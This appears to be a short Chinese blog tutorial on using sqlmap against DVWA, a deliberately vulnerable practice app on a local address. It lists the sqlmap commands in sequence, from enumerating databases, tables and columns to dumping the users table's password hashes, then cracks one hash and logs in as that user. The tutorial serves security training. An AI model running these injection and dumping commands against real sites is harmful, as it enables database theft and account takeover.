工具使用 | sqlmap的简单使用–以DVWA为靶场

  • 2019 年 10 月 7 日
  • 筆記

0x00 找到注入点

http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#

0x01 利用sqlmap进行注入

Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"

期间会遇到一些询问,可以自己判断是还是否,也可以一路回车,最后将会显示出靶机的一些相关信息,比如数据库版本、系统类型等

利用—dbs参数获取数据库信息

Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"  --dbs

利用-D指定数据库,—tables查看该数据库下所有表

Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"  -D dvwa --tables

利用-T指定表,—colums查看该表下所有列

Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"  -D dvwa -T users --columns

最后利用-C指定列,—dump进行脱裤

Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"  -D dvwa -T users -C user,password --dump

对密码的MD5值进行解密,这里以pablo用户的密码MD5值为例

0x02 利用爆出的用户名密码登陆系统

利用Sqlmap爆出的用户pablo,密码letmein进行登陆

成功登陆,关于sqlmap的用法还有很多,这里只介绍了最为常见的一种。